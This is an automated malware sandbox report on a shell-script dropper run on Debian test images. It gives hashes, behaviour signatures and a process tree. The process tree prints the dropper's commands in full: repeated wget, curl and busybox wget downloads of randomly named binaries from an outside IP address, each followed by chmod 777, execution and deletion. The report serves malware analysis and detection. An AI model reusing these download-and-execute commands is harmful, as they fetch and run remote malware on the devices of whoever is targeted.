Analysis
-
max time kernel
46s -
max time network
51s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
24/11/2024, 02:08
Static task
static1
Behavioral task
behavioral1
Sample
1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh
-
Size
10KB
-
MD5
1aa70b102e8502c836ea31a0cfc2110e
-
SHA1
5664c3b03291a47c9ca9e7d8d593334b1270ef62
-
SHA256
1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0
-
SHA512
86734e2ee4c55c4bbbd31cf846a5d177eb0dc2fc70fdf9c4bf2c6bd50fe1b3b674526e6fe42a863d3064d6f87c832c15fe45c472693d96547042f11a718d0084
-
SSDEEP
192:UuW+7fLn0OZXluW8fzFywuW+7fznQ4uW8fzU:0OZXoyUa
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 755 chmod 767 chmod 826 chmod 698 chmod 714 chmod 814 chmod 832 chmod 684 chmod 733 chmod 846 chmod 808 chmod 820 chmod 840 chmod 675 chmod 794 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm 676 9TkivajhPvPyUBtriVhosaz1inakDISTYm /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi 685 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S 700 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK 717 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 734 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk 756 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp 768 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 796 MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU 809 uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi 815 bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 821 f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n 827 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw 833 AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs 841 jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm 847 9TkivajhPvPyUBtriVhosaz1inakDISTYm -
Checks CPU configuration 1 TTPs 15 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 15 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU curl File opened for modification /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm curl File opened for modification /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm curl File opened for modification /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S curl File opened for modification /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp curl File opened for modification /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 curl File opened for modification /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n curl File opened for modification /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK curl File opened for modification /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 curl File opened for modification /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi curl File opened for modification /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs curl File opened for modification /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi curl File opened for modification /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk curl File opened for modification /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 curl File opened for modification /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw curl
Processes
-
/tmp/1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh/tmp/1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh1⤵PID:646
-
/bin/rm/bin/rm bins.sh2⤵PID:649
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:654
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:663
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:671
-
-
/bin/chmodchmod 777 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- File and Directory Permissions Modification
PID:675
-
-
/tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm./9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Executes dropped EXE
PID:676
-
-
/bin/rmrm 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:678
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:679
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:681
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:683
-
-
/bin/chmodchmod 777 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- File and Directory Permissions Modification
PID:684
-
-
/tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi./H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Executes dropped EXE
PID:685
-
-
/bin/rmrm H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:686
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:687
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:688
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:690
-
-
/bin/chmodchmod 777 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- File and Directory Permissions Modification
PID:698
-
-
/tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S./4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Executes dropped EXE
PID:700
-
-
/bin/rmrm 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:701
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:702
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:707
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:711
-
-
/bin/chmodchmod 777 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- File and Directory Permissions Modification
PID:714
-
-
/tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK./DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Executes dropped EXE
PID:717
-
-
/bin/rmrm DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:719
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:720
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:725
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:729
-
-
/bin/chmodchmod 777 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9./XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:735
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:738
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:754
-
-
/bin/chmodchmod 777 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk./Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:757
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:758
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:760
-
-
/bin/chmodchmod 777 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp./osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:769
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:771
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:781
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:790
-
-
/bin/chmodchmod 777 MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1./MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Executes dropped EXE
PID:796
-
-
/bin/rmrm MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:797
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:798
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:802
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:807
-
-
/bin/chmodchmod 777 uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU./uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:810
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:811
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:813
-
-
/bin/chmodchmod 777 bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi./bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:816
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵PID:817
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵PID:819
-
-
/bin/chmodchmod 777 f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3./f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵PID:822
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵PID:823
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵PID:825
-
-
/bin/chmodchmod 777 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n./4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵PID:828
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵PID:829
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵PID:831
-
-
/bin/chmodchmod 777 AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw./AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵PID:834
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵PID:835
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵PID:837
-
-
/bin/chmodchmod 777 jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs./jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵PID:842
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:843
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:845
-
-
/bin/chmodchmod 777 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm./9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:848
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:849
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97